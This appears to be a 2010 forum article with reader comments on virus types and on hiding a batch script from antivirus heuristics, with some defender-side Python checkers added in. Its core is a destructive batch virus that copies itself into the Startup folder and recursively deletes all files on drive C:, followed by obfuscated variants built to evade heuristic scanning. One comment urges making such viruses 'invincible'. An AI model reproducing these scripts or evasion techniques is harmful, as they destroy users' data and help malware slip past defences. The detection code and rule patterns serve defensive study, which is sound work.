Types of Viruses, How to hide a Script from the AV 

Jun 27, 2010 05:41 AM

A virus or a worm is a malicious program that, once executed, damages the operating system or the data on the system. Execution may be triggered automatically when an infected file is accessed, or by a condition such as a date or access to a particular directory. Since worms are a kind of virus, the term virus is commonly used for both; so, unless stated otherwise, virus in this article means both worms and viruses.

Characteristics of viruses

Reside in the RAM

  • Some viruses stay resident in RAM in order to monitor system activity and react to it, or to keep damaging the system.

Leave the memory immediately after execution

  • Another group of viruses leaves memory immediately after execution, so they leave very little trace, especially if they also delete their source files.

Change their code and characteristics

  • Some viruses can alter their code as they spread, or change the way they infect other files. A few are even able to generate new viruses.

Worms vs. Viruses

  • A virus spreads to another PC only when an infected file is carried to it, whereas a worm spreads by itself. In other words, a virus only infects files, and it reaches another system only once an infected file is transferred there and executed. A worm, by contrast, spreads by methods such as placing an Autorun.inf in shared folders or even exploiting vulnerabilities in applications and the OS.
  • It follows that the distribution methods of viruses are far more limited than those of worms.

Note that nowadays most malicious programs combine the distribution methods of both viruses and worms.

Types of Viruses

Stealth Viruses

  • Once activated, such a virus infects files without appending itself to them. Instead it places its code elsewhere on the disk (even on another partition) and, because it controls the system, redirects requests for the file to its own code. This sort of virus usually works together with rootkits: since a rootkit can hide any program, stealth viruses use one to hide themselves. This also lets the virus watch the antivirus's activity, and whenever the antivirus asks for the virus's data, the stealth virus alters or corrupts what is returned and so escapes detection.

Polymorphic Viruses

  • While infecting a file, these viruses alter the code they add to it, so a different variant is added in each infection. The alteration may be a rewrite into new code with the same behaviour, or a completely new virus with a new format.

Cavity Viruses (Space Filler)

  • These viruses add themselves to the end of the file and corrupt its header, so that the file size remains unchanged even though extra code has been added. The modified header redirects the operating system to execute the virus first and only then start the original program.

Camouflage Viruses

  • This hiding method is really just a simple trick: the virus presents itself as a harmless or even useful program (such as an antivirus), but once executed it carries out its malicious activity. The approach is much like that of Trojans.

Shell Viruses

  • These viruses present themselves as the main program, with the victim file becoming a subroutine of the virus. They are so called because the virus wraps the victim file the way a shell wraps an egg.

Add-on Viruses

  • Most viruses are of this type. They add themselves to the start of the file; when the file is executed the virus runs first and, when it finishes, the original program starts. Note that this sort of virus does not alter the file header.

Intrusive Viruses

  • These are the most aggressive viruses. They completely or partially remove the victim file and overwrite themselves in its place. In most cases the program no longer functions properly after infection.

Companion Viruses

  • They abuse a rule of Microsoft Windows: if two files share the same name but one has the .exe extension and the other .com, and the user types just the name without an extension, the .com file is executed. Exploiting this, the virus copies itself under the same name as an existing executable but with the .com extension.

File Extension Viruses

  • By default, Microsoft Windows hides known file extensions such as .exe and .bat. Exploiting this, the virus hides its executable extension (.com or .exe) behind a fake, harmless-looking extension such as .txt, for instance: Bad.txt.exe
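A defender-side check for the last two types, as an added example that is not part of the original article: given a directory listing (constructed here), it reports .com files that shadow a .exe of the same base name and names whose visible extension hides an executable one. The listing and the two extension sets are assumptions.

```python
import os
from collections import defaultdict

# Constructed directory listing (not from the article).
LISTING = ["calc.exe", "calc.com", "notepad.exe", "Bad.txt.exe",
           "readme.txt", "Photo.jpg.scr", "setup.exe", "report.pdf"]

# Assumed sets: extensions cmd will run, and document extensions used as decoys.
EXECUTABLE = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}
DECOY = {".txt", ".jpg", ".pdf", ".doc"}

def find_companions(names):
    """Companion check: a .com sitting beside a .exe of the same base name.

    Typing just the name runs the .com first because .COM precedes .EXE in
    the default PATHEXT order, which is the rule the article describes.
    """
    by_stem = defaultdict(set)
    for n in names:
        stem, ext = os.path.splitext(n)
        by_stem[stem.lower()].add(ext.lower())
    return sorted(stem + ".com" for stem, exts in by_stem.items()
                  if {".exe", ".com"} <= exts)

def find_double_extensions(names):
    """Extension check: Bad.txt.exe style names whose real extension is executable."""
    hits = []
    for n in names:
        inner, outer = os.path.splitext(n)   # "Bad.txt", ".exe"
        decoy = os.path.splitext(inner)[1]   # ".txt"
        if outer.lower() in EXECUTABLE and decoy.lower() in DECOY:
            hits.append(n)
    return hits
```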
Self Modification

This section describes the methods viruses use to modify themselves in order to avoid detection by antivirus software, or at least to delay it.

Encryption by XOR

  • In this method the virus has two segments: the encoder and the encoded data. The encoded part is the main body of the virus and performs the harmful actions. The encoder's job is to decode the encoded data on every execution and to re-encode it on every infection. The encoders do this by XORing the data with a variable key and storing that key inside the newly generated copy of the virus.

Polymorphic Code

  • These viruses alter their code by reordering its sequence; GOTO statements and variables are the most common techniques. Another technique is to carry several different virus bodies inside one virus and, on each infection, use one of them as the active, functional virus.

Metamorphic Viruses

  • These are the most complicated viruses. This kind of virus is able to alter its own code and reprograms itself on every execution.

How a script hides from the Antivirus Heuristic

If a signature for the virus has been produced, the antivirus easily detects and removes it. But if the virus has not been detected yet and so has no signature (the zero-day period), the antivirus has to estimate whether the file is a virus or not. The method antiviruses use for this estimation is called heuristics, and it is roughly 70% to 80% accurate.
Conversely, viruses use several methods to hide from this technology; below we deal with one of them.
First we create a sample virus:

@echo off
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
C:
Cd\
Del *.* /f /q /s

Alright, the virus is ready!
It copies itself into the Startup folder of the system and deletes all files in all subdirectories of drive C, and it does this on every restart. It is not a very realistic virus script, but don’t play with the code on a real system!
In the first method, we alter the code using GOTO:

@echo off
Goto A
:E
Cd\
Goto B
:A
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
Goto C
:B
Del *.* /f /q /s
Exit /B
Goto D
:B
C:
Goto E

This method disturbs the sequence of the commands, so the script differs from what the heuristic engine holds in its database of malicious patterns.
The next method is to use variables to alter the code:

@Echo off
Set ypy=Copy
Set sk=Menu\Programs\Startup\a.bat
Set ls=0%
Set myj=%myj%
%ypy% %ls% %sk% Menu\Programs\Startup\a.bat
set ls=C:
%ls%
Set ypy=Cd\
%ypy%
Set re=voxdi
Set re=/s
Set ypy=Del
Set sk=sjvprduwtkmw
Set sk=/f
Set ls=wrvyecx
Set ls=*.*
Set myj=/q
%ypy% %ls% %sk% %myj% %re%

Again, this method changes the sequence of the code and alters how the commands look.
Now, if we combine the two methods above, the result is much more complicated:

@echo off
set vf=Goto
set vc=A
%vf% %vc%
:E%%
set ik=Cd\
%ik%
Set vc=B
%vf% %vc%
:A%%
Set vc=wuju
Set vc=Copy
rem xfolwhuuuiqwd
Set rd=Users\Start
Set uhq=and
Set uq=Settings\All
Set ik=0%
Set rq=C:\Documents
%vc% %ik% %rq%%pvk% %uhq% %uq% %rd%%rg% Menu\Programs\Startup\a.bat
rem kshxnmudlnigqs
Set vc=C
%vf% %vc%
:B%%
Set ik=*.*
Set vc=qisjgf
Set vc=Del
Set uq=/s
Set rd=%rq%
Set rq=/f
Set uhq=/q
%vc% %ik% %rq% %uhq% %uq%
Set ik=/B
rem vfmcodgyevnutol
Set vc=Exit
%vc% %ik%
rem lrpcttoclg
Set vc=D
%vf% %vc%
:B%%
Set vc=C:
%vc%
Set vc=E
%vf% %vc%
 
Note that these scripts are only samples and may not work properly; nevertheless it is strongly recommended to perform any test or execution in a laboratory or test environment, and to avoid running them on your own systems.
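To show why this obfuscation is weak against a scanner that normalises before matching, here is an added example that is not from the article or any product: a small Python normaliser that follows SET and GOTO statically, expands %var% references once the way cmd does, and then applies two heuristic rules to the recovered commands rather than to the raw text. The sample script, the rule patterns and the label handling (first matching label wins, '%%' ignored) are assumptions.

```python
import re

# Constructed sample (not from the article): variable indirection plus GOTO
# re-ordering, a junk 'rem', a '%%' label and an undefined variable (%pvk%).
SAMPLE = r"""
set vf=Goto
%vf% A
:B
set vc=Del
%vc% *.* /f /q /s
exit /b
:A%%
rem junk
set rq=C:\Startup
Copy %0 %rq%%pvk%\a.bat
set vc=B
%vf% %vc%
"""
VAR = re.compile(r"%([^%\s]*)%")  # one %name% reference

def normalize_batch(script):
    # Follow SET/GOTO statically and return the commands that actually run.
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    labels = {}  # cmd jumps to the first matching label; '%%' is dropped here
    for i, ln in enumerate(lines):
        if ln.startswith(":"):
            labels.setdefault((ln[1:].split() or [""])[0].rstrip("%").lower(), i)
    env, out, pc, steps = {}, [], 0, 0
    while pc < len(lines) and steps < 20 * len(lines):  # guard against GOTO loops
        raw, pc, steps = lines[pc], pc + 1, steps + 1
        cmd = VAR.sub(lambda m: env.get(m.group(1).lower(), ""), raw)  # one pass, like cmd
        parts = cmd.split(None, 1)
        verb = parts[0].lower() if parts else ""
        if verb in ("", "rem", "@echo") or verb.startswith(":"):
            continue
        if verb == "set" and len(parts) == 2 and "=" in parts[1]:
            name, value = parts[1].split("=", 1)
            env[name.strip().lower()] = value
        elif verb == "goto":
            target = parts[1].strip().lower() if len(parts) == 2 else ""
            if target not in labels:  # cmd aborts the whole batch here
                return out + ["<error: label '%s' not found>" % target]
            pc = labels[target]
        elif verb == "exit": break
        else:
            out.append(cmd)
    return out
RULES = [(re.compile(r"^del\b.*\*\.\*.*/s", re.I), "recursive wildcard delete"),
         (re.compile(r"^copy\b.*%0.*startup", re.I), "copies itself into Startup")]
def flag(commands):
    return [why for cmd in commands for pat, why in RULES if pat.search(cmd)]
```

Run against the combined script in the article, the same normaliser stops at the first GOTO whose label does not exist, which is why the author notes that the samples may not work.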


Comments

Sep 20, 2010 08:23 AM

The method introduced in the article uses batch programming just as a sample. The methods mentioned can be used in any sort of programming, with modifications to make them suitable for that kind.

Making the script complex especially results in deceiving the Static Scanning method. For more information regarding Scanning Methods, you can refer to this article:

How symantec antivirus system detects viruses:

https://www-secure.symantec.com/connect/articles/how-symantec-antivirus-system-detects-viruses

Sep 20, 2010 04:30 AM

I found a malicious string in an autorun.inf file. I can't remember what it does. I deleted it for the user. All I know is that there is a possibility to make a line of command shorter. And it's like reading some sort of Esoteric language - Malbolge, I think.

I've been searching the net on encrypting text files and I mostly get bat to exe programs.

Sep 09, 2010 04:21 AM

Respected People...

It looks like this type of .bat file for Windows will stay alive only in the current context of your Windows session. To extend the functionality of this kind of virus to the TSR family, use assembly language with the concept of interrupts to make your virus invincible.
Refer to "Great Black Book of Virus" by Mark A. Ludwig..
it will

Aug 02, 2010 03:44 PM

>>separating the viruses and worms will not come to successful ending so that the categories boundaries are not certain

I understand and admit. The boundaries and/or the line of demarcation between the individual categories and types of viruses are rather thin. However, if there is awareness among people, such threats can be minimized.

IMHO, heightened awareness can be considered as an effective mitigation strategy against such threats.

Jul 02, 2010 12:04 PM

Dear Deepak,
Thank you for the comment.

The categories in this article can never be fully comprehensive, since a virus or worm always uses several different methods to act. As mentioned in the article, even separating viruses from worms does not come to a clean conclusion, so the category boundaries are not certain, and the categories in the article are only the major, highlighted groups.
The quality you mentioned can be present in any of the above categories and is not a very distinct characteristic, while the mentioned categories are not fully distinct either!

Jun 29, 2010 12:27 AM

Some time back they used to call certain viruses TSR (Terminate and Stay Resident). Some people say this breed still exists. Can you expand the article to cover these too?
